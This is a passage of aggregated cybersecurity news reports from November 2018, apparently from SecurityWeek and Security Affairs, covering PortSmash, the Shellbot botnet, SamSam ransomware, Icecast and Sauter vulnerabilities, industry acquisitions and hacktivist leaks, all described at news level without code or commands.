Furthermore, the researcher explained, an attacker could make configuration changes that are not immediately obvious. For instance, some of the analyzed protection devices have different settings for different seasons and a hacker could ensure that the changes they make would only go into effect when a certain season starts, which would disguise the attack.

Power analysis attacks can pose a serious threat because they are practically impossible to detect, as an attacked device could seemingly continue performing its normal operations even after it has been compromised, the researcher explained.

Conducting such attacks in a real-world scenario is not an easy task, but it’s not impossible. Andreou pointed out that it may not be difficult to obtain physical access to such devices as they are often left unsupervised. Malicious insiders, consultants, and repair centers could have plenty of opportunities to launch an attack.

On the other hand, the attack must be launched — i.e., the power consumption must be measured — exactly when the device performs an operation that involves the targeted crypto key. This requires reverse engineering the device and knowing ahead of time what type of product is targeted.

Conducting an attack could take hours, most of which involves physical preparation (e.g., opening the targeted device, connecting sensors). The software part of the attack is much faster and the key can be obtained in a matter of minutes.

For instance, if the Advanced Encryption Standard (AES) is used, the attacker can extract the key one byte at a time. In the case of AES-128, all they need to do is go through combinations from 00 to 255 for each of the 16 characters of the encryption key and monitor power profiles for each attempt.

Symantec Acquires Appthority, Javelin Networks
6.11.2018 securityweek

Symantec on Monday announced the acquisition of mobile application security firm Appthority and Active Directory protection company Javelin Networks.

With the acquisition of Appthority, Symantec wants to provide customers the technology needed to analyze mobile applications for malicious capabilities and unwanted behavior, including vulnerabilities, exposure of sensitive data, and privacy risks.

According to Symantec, the technology obtained from Appthority will be built into Symantec Endpoint Protection Mobile (SEP Mobile), which the security firm launched following the acquisition of Skycure last year.

Appthority was a Symantec Ventures portfolio company before the acquisition. The mobile security firm’s employees and technology have now become part of Symantec’s endpoint security business.

“Mobile apps are a critical threat vector that every company must address to protect their enterprise security,” said Adi Sharabani, Sr. Vice President for Modern OS Security at Symantec. “The Appthority technology extends SEP Mobile’s capabilities in limiting unwanted app behaviors, supporting regulatory compliance, and assessing vulnerabilities.”

Employees and technology of Javelin Networks have also joined Symantec’s endpoint security business.

Symantec believes that its acquisition of Javelin technology will protect customers against threats abusing Microsoft’s Active Directory (AD) service. The security firm pointed out that malicious actors, including advanced persistent threats (APTs), have increasingly abused AD for reconnaissance and lateral movement.

Javelin’s AD security solutions are designed to detect misconfigurations and backdoors, and protect commonly used domain resources, such as credentials, controllers and identities.

Symantec has not disclosed financial terms for either of the acquisitions.

Addressing the 3 Million Person Cybersecurity Workforce Gap

6.11.2018 securityweek Cyber

The Biggest Problem is Not in Measuring the Accuracy of the Cybersecurity Skills/Workforce Gap, But in Finding a Way to Close It

(ISC)2's Cybersecurity Workforce Study 2018 claims that cybersecurity professionals are focusing on developing new skills as the workforce gap widens. According to the recently released report, that gap now stands at more than 2.9 million workers globally -- with 2.14 million cybersecurity staff required in the Asia-Pacific region, and almost half a million required in North America.

The figures come from what (ISC)2 calls a 'more holistic approach to measuring the gap'. Rather than simply subtracting supply from demand, this new calculation "takes other critical factors into consideration, including the percentage of organizations with open positions and the estimated growth of companies of different sizes."

Whether this makes it any more scientific than other attempts to measure the cybersecurity workforce and skills gap is still questionable. (ISC)2 questioned 1,500 people around the world working on security. It therefore has its own built-in bias -- most people, in any profession, will consider themselves overworked and capable of doing better with an expanded team. The same argument applies to budgetary concerns -- most people would like a bigger budget, regardless of profession.

Despite these concerns, the figures generated (PDF) are interesting. Fifty-nine percent of respondents claim their organization is at extreme or moderate risk due to a cybersecurity staff shortage.

Sixty percent said their budget should be much or at least slight ly higher than it is.

However, regardless of any concerns over any potential biased inflation, nobody doubts that there is a workforce gap, and that most companies should pay at least more attention and possibly more money to cybersecurity. The biggest problem is not in measuring the accuracy of the skills/workforce gap, but in finding a way to close it.

Some experts believe the solution must be found in the education system. There is, says David Emm, principal security researcher at Kaspersky Lab, a "lack of interest in the sector from the future generation. Our education system and the industry itself are not inspiring young people's interests and talent in the field of cybersecurity -- we need to be encouraging people into the industry. It's increasingly important to equip children with cybersecurity skills at an early age to give them an idea of what cyber roles entail, and foster these skills."

Kaspersky Lab has its own interesting figures on the young. Only half (50%) of under-25s say they would join the fight against cybercrime; but 17% would use their skills for fun, 18% would use them for 'secretive activities', and 16% would use them for financial gain.

Other security experts believe that the solution must come from the industry itself. "Filling the skill shortage will require organizations to change their attitude and approach to hiring, training, and participating in collaborative pipeline development efforts," says Steve Durbin, managing director of the Information Security Forum. His view is that the solution must come from within the industry.

"Organizations," he says, "need to establish a series of strategic objectives that lay a foundation for a stronger workforce and more robust pipeline. With clear direction and sustained HR efforts, organizations can formalize the structure of the security workforce, harness the appropriate talent, and bring security teams into better alignment with the organization's security objectives."

Dr. Bret Fund, Founder and CEO at SecureSet, agrees. "Organizations need to build sustainable recruiting practices as well as develop and retain the talent they already have to boost the organization's cyber resilience."

But there is a growing school of thought that suggests that the solution is in reversing the argument. The problem is not so much that we don't have enough bodies for the work required, but that we have too much work for the bodies available. This argument suggests that technology -- or more specifically, AI-enabled automation -- should be used to reduce the workload.

One such proponent is Chris Morales, head of security analytics at Vectra. "A greater use of AI technology can make a considerable contribution to bridging the cyber skills and resource gap that the latest (ISC)2 report identifies," he says. "AI augments the human capabilities to work at a scale and speed manual approaches simply can't touch; and with "lack of time" as a one of the top job concerns being cited from IT and security professionals this would be invaluable."

He is concerned that existing approaches to filling the workforce and skills gap are inefficient. "There is still the assumption," he added, "that certain qualifications such as computing, and mathematics are essential for working in cyber security. In fact, lots of employers still ask for (ISC)2 style certification. Yet, this doesn't need to be the case and is only unnecessarily compounding the problem of a lack of new staff in this area."

This assumption is confirmed in the (ISC)2 report. Among the respondents, the most important qualification for employment (49%) is considered to be 'relevant cybersecurity work experience'. Not far behind (40%) is 'extensive cybersecurity work experience'. Cybersecurity certification is the third most required attribute at 43%, with general purpose proof of aptitude and intelligence ('a cybersecurity or related undergraduate degree') languishing at the bottom of the table with just 20%.

For so long as organizations insist on recruiting only experienced staff with existing security certifications, they're cutting off the supply of potential talent from the education system -- and inevitably compounding the problem. Aptitude should perhaps be the primary recruitment requirement, with extensive 'on the job' training to follow.

(ISC)2 seems to recognize this. The report concludes, "Companies who employ new recruits should explore options available for training them for the job and setting them up for success. They also need to provide more professional development opportunities for the people who already work in cybersecurity -- and allow sufficient time for their staff to pursue them."

Thoma Bravo Buys Veracode From Broadcom for $950 Million

6.11.2018 securityweek IT

Private equity investment firm Thoma Bravo on Monday announced that it has entered an agreement to acquire application security testing company Veracode from Broadcom.

Thoma Bravo is prepared to pay $950 million in cash, with the transaction expected to close in the fourth quarter of 2018.

The investment firm says it will support Veracode’s operational and product development plans. Sam King, current senior vice president and general manager of Veracode, will become the CEO of Veracode once the acquisition is completed.

Veracode offers an application security testing platform that helps developers and security teams find and fix vulnerabilities in the software they use, including their own and third-party applications. The company claims to have over 2,000 customers, including nearly one-third of Fortune 100 firms and more than 20 of the Forbes 100 Most Valuable Brands.

“Partnering with Thoma Bravo, a proven security software investor, is expected to extend our market reach and further fuel our innovation so that we can offer the broadest software security platform and empower us to accelerate growth — all to allow us to transform the way companies achieve their software security goals,” King said.

Broadcom sold Veracode just as it completed the acquisition of CA Technologies, for which it paid nearly $19 billion. CA Technologies bought Veracode for $614 million in cash in 2017.

Now that the acquisition has been completed, CA will operate as a wholly owned subsidiary of Broadcom and its common stock will no longer be traded on NASDAQ.

Thoma Bravo has acquired more than 30 enterprise security companies over the past years, including SailPoint, Barracuda Networks, Imperva, Crossbeam Systems, Centrify, LogRhythm, and Imprivata.

New Side-Channel Vulnerability Leaks Sensitive Data From Intel Chips

6.11.2018 securityweek Vulnerebility

A newly revealed side-channel attack can leak encrypted data from Intel microprocessors that use a Simultaneous Multithreading (SMT) architecture.

Dubbed PortSmash and tracked as CVE-2018-5407, the vulnerability affects all CPUs that rely on SMT, including Intel’s Hyper-Threading architectures. By exploiting the vulnerability, an attacker could extract sensitive data such as encryption keys from a computer’s memory or processor.

The issue was discovered by researchers at Tampere University of Technology in Finland, and Universidad Tecnológica de la Habana (CUJAE) in Cuba. By exploiting the vulnerability, they were able to steal an OpenSSL P-384 private key from a TLS server.

As Billy Brumley from the Tampere University of Technology explains, the bug can be categorized as information disclosure through timing discrepancy and exists due to execution engine sharing on SMT.

The SMT technology makes it possible for multiple threads to be executed simultaneously on a CPU core. Because of this, however, malicious code could snoop into the code running on the other thread on the same core, even if it belongs to a cryptographic application, which would normally include protections against side-channel assaults.

“We detect port contention to construct a timing side channel to exfiltrate information from processes running in parallel on the same physical core,” he says.

For the attack to be successful, the malicious process needs to run on the same physical core as the victim process.

The vulnerability has been verified on Intel's Skylake and Kaby Lake processors, and experts believe that chips from other manufacturures such as AMD could also be vulnerable. Proof-of-concept (PoC) code for Intel chips has already been published. The code was designed to measure timing discrepancies and discover and exfiltrate protected data from the victim process.

“This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in spy is likely needed,” the researcher notes.

Brumley underlines the fact that this is a hardware issue that has nothing to do with the memory subsystem or caching. He also points out that any “software that has secret dependent control flow at any granularity” is impacted.

By abusing the new type of attack, an actor could steal “generated keys and decrypt any conversation that would otherwise have been protected by the key,” Justin Jett, Director of Audit and Compliance for Plixer, told SecurityWeek in an email.

“Additionally, because the malware writer is already on the machine, they have a better understanding of where these keys may be used (for example, were the keys then moved to a specific folder that is being used by an application installed on the machine),” Jett continued.

To mitigate impact, one would need to disable SMT/Hyper-Threading in the BIOS setup. However, the option might not be available in many systems, as OpenBSD’s Mark Kettenis points out.

The vulnerability was reportedly submiited to Intel in early October. PortSmash, however, does not appear related to recently discovered attacks that rely on speculative execution, such as Spectre and Meltdown. It has nothing in common with Foreshadow/L1 Terminal Fault (L1TF) either.

“PortSmash, and all the other processor vulnerabilities like Meltdown and Spectre, is a reminder that we have to rotate the keys and certificates that serve as machine identities, much more frequently than we do," Kevin Bocek, chief cybersecurity officer at Venafi, told SecurityWeek. "Our machine identities are kept around for years, and it’s crazy to think machine that they won’t be attacked. This is especially true a cloud and microservices environments, where these kinds of vulnerabilities are most dangerous."

"The reality is that most keys and certificates aren’t changed often, and a surprising number are never changed," Bocek added. "These are the machine identities that are most at risk from PortSmash."

In February 2018, Intel announced that it would offer up to $250,000 for valid side-channel exploits reported through its bug bounty program.

Iran Accuses Israel of Failed Cyber Attack
6.11.2018 securityweek

Iran accused Israel on Monday of launching a failed cyber attack against its communications systems.

"A regime whose record in using cyber weapons is clear from cases such as Stuxnet has tried this time to damage Iran's communication infrastructure," said Information Minister Mohammad Javad Azari Jahromi on his Twitter account.

He was referring to the Stuxnet virus, discovered in 2010 and believed to have been engineered by Israel and the United States, which damaged nuclear facilities in Iran.

"Thanks to vigilance of the technical teams, they returned empty-handed. We will follow up this hostile action through international forums," Jahromi said.

His deputy, Hamid Fattahi, said technical teams had intercepted multiple attempts to infiltrate their systems early on Monday, and had been "strongly warded off".

Shellbot Botnet Targets IoT devices and Linux servers
6.11.2018 securityaffairs
BotNet  IoT

Security experts at Trend Micro have spotted an IRC bot dubbed Shellbot that was built using Perl Shellbot.
The malware was distributed by a threat group called Outlaw, it was able to target Linux and Android devices, and also Windows systems.

“We uncovered an operation of a hacking group, which we’re naming “Outlaw” (translation derived from the Romanian word haiduc, the hacking tool the group primarily uses), involving the use of an IRC bot built with the help of Perl Shellbot.” reads the analysis published by TrendMicro.

“The group distributes the bot by exploiting a common command injection vulnerability on internet of things (IoT) devices and Linux servers. Further research indicates that the threat can also affect Windows-based environments and even Android devices.”

perl shellbot -script-commands-8

In recent attacks, hackers compromised FTP servers of a Japanese art institution and a Bangladeshi government site. The attackers linked compromised servers to a high availability cluster to host an IRC bouncer and control the botnet.

The bot was previously distributed via an exploit targeting the ShellShock flaw, in October experts from IBM observed the bot being spread through the Drupalgeddon2 vulnerability,

In the last series of attacks analyzed by Trend Micro, threat actors leveraged previously brute-forced or compromised hosts to distribute the threat and target Ubuntu and Android devices.

The analysis of command and control (C&C) traffic allowed the security researchers finding the IRC channels’ information and discovered that at the first infection 142 hosts were present in the IRC channel.

The Shellbot backdoor is controlled by the IRC channel’s administrator that can instruct it to perform various activities, including a port scan, several types of distributed denial of service (DDoS), download a file, get information about the infected system.

The attack chain starts with the malware running a command on the target, to verify that it accepts commands from the command-line interface (CLI). The malicious code changes the working directory to “/tmp” and downloads a payload and run it with the Perl interpreter. The payload is removed in the final step and no trace remains on the attacked system.

“During the traffic monitoring, several identities such as luci, lucian, dragos, mazy, hydra, and poseidon were spotted in IRC communication channels.”

“These identities were also found as usernames on a compromised Japanese server. This server seemed to have a certain importance as it was also used to distribute an early version of this N3-Shellbot.”

Researchers were able to get downloads of the files that the threat actors used. The experts used the credentials from one of the commands injected into the honeypots, they noticed the files’ contents often changed on the server and modification, deletion and addition of files mostly happened during daytime in Central European Time/CET.

Further details were reported in the analysis published by TrendMicro.

Google dorks were the root cause of a catastrophic compromise of CIA’s communications
6.11.2018 securityaffairs

Google queries allowed Iran Government to dismantle the CIA communication network used by its agents and kill dozens of tens of spies
The alleged hack of the communications network used by CIA agents allowed Iranian intelligence to identify and kill at least 30 spies.

According to Yahoo! News the security breach has happened in 2009, the Iranian intelligence infiltrated a series of websites used by the CIA to communicate with agents worldwide, including Iran and China.

“The previously unreported global problem originated in Iran and spiderwebbed to other countries, and was left unrepaired — despite warnings about what was happening — until more than two dozen sources died in China in 2011 and 2012 as a result, according to 11 former intelligence and national security officials.” reported Yahoo News.

“A former senior intelligence official with direct knowledge of the compromise said it had global implications for the CIA. “You start thinking twice about people, from China to Russia to Iran to North Korea,” said the former official. The CIA was worried about its network “totally unwinding worldwide.””

A former national security official confirmed that the US Intelligence Agency is still dealing with the fallout and dozens of people around the world were killed because of this failure.

Experts speculate that the hack of the communications network was the result of a simple Google search. The Iranian intelligence initially identified a double agent that showed them one of the sites used by the network of CIA agents, then Iranian counter espionage used Google to identify other similar sites used by the CIA and started to intercept their communications.

“According to the former intelligence official, once the Iranian double agent showed Iranian intelligence the website used to communicate with his or her CIA handlers, they began to scour the internet for websites with similar digital signifiers or components — eventually hitting on the right string of advanced search terms to locate other secret CIA websites. From there, Iranian intelligence tracked who was visiting these sites, and from where, and began to unravel the wider CIA network.” continues the report.

“In fact, the Iranians used Google to identify the website the CIA was using to communicate with agents.”

Iran announced identified and arrested many spies, some of them were executed.

Iran also shared information of the CIA communication network with friendly countries that used it to dismantle CIA’s activities in their own territories.

In a 2012 incident in China, the Chinese government identified and killed 30 US spies.

The report published by Yahoo also cited a defense contractor for the CIA named John Reidy that warned the agency of it was using insecure communications systems in 2008, and again in 2010. Unfortunately, he was fired by the agency, likely in retaliation for not shutting up.

“In 2008 — well before the Iranians had arrested any agents — a defense contractor named John Reidy, whose job it was to identify, contact and manage human sources for the CIA in Iran, had already sounded an alarm about a “massive intelligence failure” having to do with “communications” with sources.” states the report.

“According to Reidy’s publicly available but heavily redacted whistleblower disclosure, by 2010 he said he was told that the “nightmare scenario” he had warned about regarding the secret communications platform had, in fact, occurred.”

“It was a recipe for disaster,” Reidy said. “We had a catastrophic failure on our hands that would ensnare a great many of our sources.”

New attack by Anonymous Italy: personal data from ministries and police have been released online
6.11.2018 securityaffairs

New attack by Anonymous Italy: personal data from ministries and police have been released online. The site of Fratelli d’Italia, a post-fascist party, has been defaced
The iconoclastic fury of Italian Anonymous does not stop. As announced, the three groups that coordinate the operation “Black Week” have released also today new data from their raids on online sites and databases. In the materials disclosed today there are names, surnames, telephone and email numbers of employees and officials of various research institutes of the National Research Council, the Equitalia databases and that of the Ministry of Economic Development.

Sensitive data by members of the Lega Nord del Trentino, Fratelli d’Italia and the Democratic Party of the city of Siena were disseminated. And then there are names and surnames belonging to Assopolizia (a national association of policemen) from Rome to Belluno and those of the Central Institute for Archives. Ironically it is the same Institute that has the task of developing national standards and guidelines for the creation of archival information systems and digital databases, let’s say without too much attention to security. Among the information also leaked the names of users of a portal on the theme of railways and modeling, perhaps confused with that of the State Railways.

A fact that tells us two things: the Anonymous have mixed high goals attacking the General Directorate for energetic activities of the Ministry of economic development and a site taken at random. Repubblica has been able to check the data in the databases released by Anonymous “in the wild”, as the informatics say. In fact, names, surnames, telephones and passwords of the workers of some attacked entities present in the disclosed databases are real. In the case of employees of the Ministry of Economic Development we could verify that the passwords did not correspond all, but names, emails and telephone and landline numbers instead.

According to Professor Rocco De Nicola of the School Imt, High Studies of Lucca, an expert in cybersecurity, “It is time for anyone who sets up a site to do so with special attention to privacy and security. “

Several sites were also defaced during the “Black Week”. Today was the turn of the site of Fratelli d’Italia, a post-fascist party, whose homepage has been replaced with the mask of Anonymous. The attacks, the defacements, the disclosure of mail archives, names and telephones, should celebrate, in the intentions of the hacktivist, the day of November 5, the anniversary of the Powder Conjure which was attended by the English revolutionary Guy Fawkes whose face has become a universal symbol of rebellion thanks to the mask made known by the film “V for Vendetta”.

The attack is also the contribution given by Anonymous Italy to the Million Mask March, the march of the million masks against abuse of power by anyone committed anywhere in the world, today at 18 o’clock in Milan simultaneously with the event in Amsterdam. Meanwhile, hundreds of people disguised as Guy Fawkes have already invaded the streets of cities and capitals such as London and Brisbane, Germany, Norway, the Philippines, even Nepal.

This protest has been politically motivated since the first video-release of October 28 in which the Anonymous invited “the people” to react (“The fear has taken possession of you, and the mental chaos has meant that you address the current government “) calling everyone to action:

«If you see what we see, if you think of it as we think, and if you are looking like we are, we ask you to stand by our side, and no longer accept the lies and the gag that puts us in the state.»

Now, with today’s leak, they reaffirmed that privacy is not a joke and that an increasingly digital society is a fragile society. By definition.

Flaw in Icecast streaming media server allows to take off online Radio Stations
5.11.2018 securityaffairs

Icecast streaming media server is affected by a flaw that could be exploited by an attacker to take off the broadcast of online radio stations.
Icecast streaming media server is affected by a vulnerability, tracked as CVE-2018-18820, that could be exploited by an attacker to take off the broadcast of online radio stations. Icecast supports both audio and video data and is maintained by the Xiph.org Foundation. Icecast is distributed under the GNU GPL, version 2, it can be used to create an Internet radio station or a privately running jukebox and many things in between.

The vulnerability was discovered by a researcher at the Semmle Security Research Team using LGTM, a software that analyzes checks code for vulnerabilities.

“I spotted a vulnerability in Icecast, the open source streaming media server maintained by the Xiph.org Foundation.” reads the security advisory.

“Attackers could craft HTTP headers that would overwrite the server’s stack contents, leading to remote code execution. Since Icecast is commonly used to host internet radio stations, a motivated attacker could potentially take a station off air.”

The flaw affects Icecast servers running versions 2.4.0 to 2.4.3 and using URL authentication.

The expert developed a proof-of-concept exploit that caused a segmentation fault in the server process triggering a DoS condition. The expert pointed out that further efforts could allow a persistent attacker to achieve full-blown remote code execution of the vulnerable system.


The experts at Xiph promptly patched the flaw with a minimum effort and a smart solution.

“The folks at Xiph patched the bug quickly, and the fix is pretty simple. It simply checks the return value from snprintf, and, if it causes post_offset to point beyond the end of the buffer, it logs an error and exits the loop.” continues the advisory.

Users should upgrade their installs to version 2.4.4 as soon as possible.

Technical details of the vulnerability are included in the post published by Nick Rolfe from of Semmle Security Research Team.

USB drives are primary vector for destructive threats to industrial facilities
5.11.2018 securityaffairs

USB removable storage devices are the main vector for malware attacks against industrial facilities, states Honeywell report.
According to a report published on by Honeywell, malware-based attacks against industrial facilities mostly leverage USB removable storage devices

Experts from Honeywell analyzed data collected with the Secure Media Exchange (SMX), a product it has launched in 2017 and that was designed to protect industrial facilities from USB-borne threats.

industrial facilities usb attacks

The experts analyzed attacks against energy, oil and gas, chemical manufacturing, pulp and paper, and other sectors, they collected data from 50 locations in four continents.

In 44% of the analyzed locations, the SMX product had blocked at least one suspicious file, experts pointed out that of the neutralized threats, 26% could have caused major disruptions to ICS systems.

“While the volume of malware discovered in this research was small relative to the total sample size volume, the malware potency was significant.” states the report.

“Of those threats blocked by SMX, 1 in 4 (26%) had the potential to cause a major disruption to an industrial control environment, including loss of view or loss of control, and 16% were targeted specifically against Industrial Control System (ICS) or Internet of Things (IoT) systems.”

16% of the malware detected by the product was specifically designed to target ICS or IoT systems, and 15% of the samples belonged to high profile families such as Mirai (6%), Stuxnet (2%), Triton (2%), and WannaCry (1%).

industrial facilities usb attacks 2.JPG

“These findings are worrisome for several reasons. That high-potency threats were at all prevalent on USB drives bound for industrial control facility use is the first concern. As ICS security experts are well aware, it only takes one instance of malware bypassing security defenses to rapidly execute a successful, widespread attack,” continues the report.

“Second, the findings also confirm that such threats do exist in the wild, as the high-potency malware was detected among day-to-day routine traffic, not pure research labs or test environments. Finally, as historical trends have shown, newly emerging threat techniques such as TRITON, which target Safety Instrumented Systems, can provoke copycat attackers.”

The report shows that most of the attacks involved not targeted threats, most of the malware detected by the Honeywell product were Trojans (55%), followed by bots (11%), hacking tools (6%), and potentially unwanted applications (5%).

The analysis of malware functionalities revealed that 32% of malicious code implemented RAT features, 12% dropper capabilities and 10% DDoS abilities.

Of the malware discovered, 9% was designed to directly exploit flaws in the USB protocol or interface.

“Of the malware discovered, 9% was designed to directly exploit USB protocol or interface weaknesses, making USB delivery even more effective — especially on older or poorly configured computers that are more susceptible to USB exploits.” continues the report.

“Some went further, attacking the USB interface itself. 2% were associated with common Human Interface Device (HID) attacks, which trick the USB host controller into thinking there is a keyboard attached, allowing the malware to type commands and manipulate applications. This supports earlier Honeywell findings that confirmed HID attacks such as BadUSB as realistic threats to industrial operators,”

High severity XML external entity flaw affects Sauter building automation product
5.11.2018 securityaffairs

A security researcher has found a serious vulnerability in a building automation product from Sauter AG that could be exploited to steal files from an affected system.
Sauter AG CASE Suit is a building automation product used worldwide that is affected by a high severity XML external entity (XXE) vulnerability that could be exploited to steal files from an affected system.

According to the ICS-CERT the software widely used in the critical manufacturing sector.

The flaw is tracked as CVE-2018-17912, it was discovered by Gjoko Krstic from industrial cybersecurity firm Applied Risk, the issue affects the CASE Suite versions 3.10 and prior and impacts the CASE Components, CASE Sensors, and CASE VAV applications.

“An XXE vulnerability exists when processing parameter entities, which may allow remote file disclosure.” reads the security advisory published by the ICS-CERT.

“Successful exploitation of this vulnerability could allow an attacker to remotely retrieve unauthorized files from the system.”

The security vulnerability has been assigned CVSS scores of 7.5 (ICS-CERT), an attacker can exploit it to steal any file from the vulnerable system, including personal information, account credentials, and configuration data.

According to the advisory published by Applied Risk, there are no known public exploits
targeting this flaw.

“An unauthenticated user can craft a malicious XML data file that will enable them to read arbitrary files within the context of an affected system allowing disclosure of valuable information via out of band channels” reads the security advisory published by Applied Risk.

Krstic pointed out that the vulnerability can also be exploited to trigger a denial-of-service (DoS) condition.

Sauter building automation

The vulnerability could be triggered using a specially crafted malicious XML data file that will enable them to read arbitrary files within the context of an affected system.

“The application suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” continues Applied Risk.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML data file.”

The malicious file can be sent to the victims via email or the attacker that already has access to the system can place the malicious XML file on the system anywhere and it will be automatically loaded when the user browses to that path via the Sauter software.

The good news is that Sauter released a security patch only ten days after the ICS-CERT notified it to the company.

PortSmash flaw in Hyper-Threading CPU could allow sensitive data theft
5.11.2018 securityaffairs

PortSmash side-channel flaw that could be exploited with a timing attack to steal information from other processes running in the same CPU core.
PortSmash is a new side-channel vulnerability that could be exploited with a timing attack to steal information from other processes running in the same CPU core with SMT/hyper-threading enabled.

A group of researchers from Tampere University of Technology in Finland (Billy Bob Brumley, Cesar Pereida Garcia, Sohaib ul Hassan, and Nicola Tuveri) and the Universidad Tecnologica de la Habana CUJAE in Cuba (Alejandro Cabrera Aldaya) demonstrated that it is possible to steal a private decryption key from an OpenSSL thread running in the same CPU core where the exploit code was in execution.

The experts also published a research paper titled “Port Contention for Fun and Profit.”

“We steal an OpenSSL (<= 1.1.0h) P-384 private key from a TLS server using this new side-channel vector. It is a local attack in the sense that the malicious process must be running on the same physical core as the victim (an OpenSSL-powered TLS server in this case).” reads the security advisory.

SMT/Hyper-threading is a “Simultaneous Multithreading (SMT)” technology that allows code developed to execute multiple threads to be processed in parallel within a single CPU core with a significant increase of the performance.

Experts were able to detect port contention to carry out a timing side channel to exfiltrate a private key from processes running in parallel on the same CPU core.

“These ports are the object of the discussed port contention. Let’s for example suppose port 5 is used by a victim process during a particular crypto operation: while the victim process is not using port 5, the spy process running on the other thread will have undelayed access to repeatedly execute on port 5; as soon as the victim process issues an operation on port 5, the scheduler will delay ops from the spy process to ensure fairness. The spy process can thus measure the delay in the execution of its operations for port 5, and determine when the victim process is using the same port.

This is the signal that can then be processed to ultimately recover a private key.” – Tuveri told BleepingComputer.

The experts successfully tested this flaw against Intel Skylake and KabyLake processors, but they expect it works also on AMD Ryzen processors.

“We verified it on Intel Skylake and Kaby Lake, but just because we did not have access to different machines with SMT,” Tuveri added.

“We expect it to work also on AMD Ryzen, but left this to future work.”

The experts also published a proof-of-concept exploit that targets OpenSSL, maintainers of the library addressed the flaw with the release of the OpenSSL 1.1.1.

To mitigate the attack, experts suggest disabling SMT/Hyper-threading on a computer.

Crooks offered for sale private messages for 81k Facebook accounts
5.11.2018 securityaffairs

Cybercriminals offered for sale private messages from at least 81,000 Facebook accounts claiming of being in possession of data from 120 million accounts.
Crooks are offering for sale Criminals are selling the private messages of 81,000 hacked Facebook accounts for 10 cents per account.

According to the BBC, crooks are offering for sale on underground criminal forums the private messages of 81,000 hacked Facebook accounts.

“The perpetrators told the BBC Russian Service that they had details from a total of 120 million accounts, which they were attempting to sell, although there are reasons to be sceptical about that figure.” states the BBC.

The BBC Russian Service investigated the alleged data breach along with cybersecurity firm Digital Shadows and determined they are authentic.

Most of the 81,000 Facebook users whose data were offered for sale were from Ukraine and Russia.

FAcebook accounts hacked

The seller, who goes online with the moniker “FBSaler,” claims being in possession of information related to 120 million Facebook users and is offering the access to the private messages for 10 cents per account.

FBSaler advertised the data on an underground hacking forum called BlackHatWorld and provided a link to a site named FBServer where sample data was posted.

“We sell personal information of Facebook users. Our database includes 120 million accounts, with the ability to sample by specific countries. The cost of one profile is 10 cents.” Wrote FBSaler.

“Data from a further 176,000 accounts was also made available, although some of the information – including email addresses and phone numbers – could have been scraped from members who had not hidden it,” continued the BBC report.

Experts from Digital Shadows traced the advertisement to an IP address in Saint Petersburg, they also linked the IP address to a campaign spreading LokiBot password-stealing.

Which is the data source?

Facebook analyzed the data and discovered that information offered by crooks has been harvested through malicious browser extensions.

“We have contacted browser-makers to ensure that known malicious extensions are no longer available to download in their stores,” said Facebook executive Guy Rosen.

“We have also contacted law enforcement and have worked with local authorities to remove the website that displayed information from Facebook accounts.”

Malicious browser extensions are a common mean for attackers to obtain the precious information.

In September 2017 a malicious Chrome extension dubbed Browse-Secure that masqueraded as an extension that allows you to perform encrypted searches was used to steal information from Facebook accounts.

Experts suggest avoiding using browser extensions that are installed by a limited number of users or that haven’t good ratings

SamSam ransomware continues to make damages. Call it targeted Ransomware
5.11.2018 securityaffairs

According to the Symantec experts, the group behind the SamSam ransomware has continued to launch attacks against organizations during 2018.
Security experts from Symantec published an interesting post on the evolution of the SamSam ransomware that in the last month was involved in targeted attacks against several organizations including the Colorado Department of Transportation (DOT) and the City of Atlanta.
According to the experts, the group behind the SamSam ransomware has continued to launch attacks against organizations during 2018, they observed fresh attacks against 67 different targets, most of them in the U.S.

The SamSam ransomware is an old threat, attacks were observed in 2015 and the list of victims is long, many of them belong to the healthcare industry. The attackers spread the malware by gaining access to a company’s internal networks by brute-forcing RDP connections.

Among the victims of the Samsam Ransomware, there is the MedStar non-profit group that manages 10 hospitals in the Baltimore and Washington area. Crooks behind the attack on MedStar requested 45 Bitcoins (about US$18,500) for restoring the encrypted files, but the organization refused to pay the Ransom because it had a backup of the encrypted information.

In April 2016, the FBI issued a confidential urgent “Flash” message to the businesses and organizations about the Samsam Ransomware.

Back to the present, the Samsam Ransomware made the headlines in the first days of 2018, the malicious code infected systems of some high-profile targets, including hospitals, an ICS firm, and a city council.

SamSam ransomware
Symantec pointed out that the SamSam ransomware mostly infected systems in healthcare (24% of victim organizations), likely because healthcare organizations are easier to compromise and the likelihood they will pay ransom is high.

SamSam is different from other ransomware, Symantec used the term “targeted ransomware” because it also performs extensive reconnaissance before launching the attack.

“SamSam specializes in targeted ransomware attacks, breaking into networks and encrypting multiple computers across an organization before issuing a high-value ransom demand.” reads the analysis published by Symantec.

“The vast majority of SamSam’s targets are located in the U.S. Of the 67 organizations targeted during 2018, 56 were located in the U.S. A small number of attacks were logged in Portugal, France, Australia, Ireland, and Israel.”

SamSam ransomware Infographic

The SamSam crew is highly skilled and resourceful, experts compared their attacks with the ones carried out with cyber espionage groups.

“In order to carry out its attacks, the SamSam group makes extensive use of “living off the land” tactics: the use of operating system features or legitimate network administration tools to compromise victims’ networks.” continues the analysis.

“These tactics are frequently used by espionage groups in order to maintain a low profile on the target’s network. “

The hackers used freely available hacking tools like Mimikatz and also software like Microsoft Sysinternal PsInfo that allows the user to gather information about other computers on the network.

Experts close the post recommending the importance of backup of important data for combating ransomware infections.

Twitter deletes over 10,000 accounts that aim to influence U.S. voting
5.11.2018 securityaffairs

Twitter announced to have deleted more than 10,000 accounts managed by bots that were posting messages to influence U.S. Midterm election.
Twitter announced to have deleted more than 10,000 accounts managed by bots that were posting messages to discourage people from voting in Tuesday’s U.S. Midterm election. The accounts were created to appear from Democrats, but the party reported the abuse to Twitter calling for an action and the company, in turn, deleted them in late September and early October.

“We took action on relevant accounts and activity on Twitter,” a Twitter spokesman told via email to the Reuters.

The suspension of the accounts was requested by the Democratic Congressional Campaign Committee (DCCC), a party group that supports Democrats running for the U.S. House of Representatives.

The DCCC has developed a system for identifying and reporting bot used to control social media accounts, it leverages publicly available tools such as “Hoaxley” and “Botometer” developed by University of Indiana computer researchers.

“We made Hoaxley and Botometer free for anyone to use because people deserve to know what’s a bot and what’s not,” explained Filippo Menczer, professor of informatics and computer science at the University of Indiana.

The Democratic National Committee is part of a network of professionals and a group of contractors that works to identify misinformation campaigns through social media.

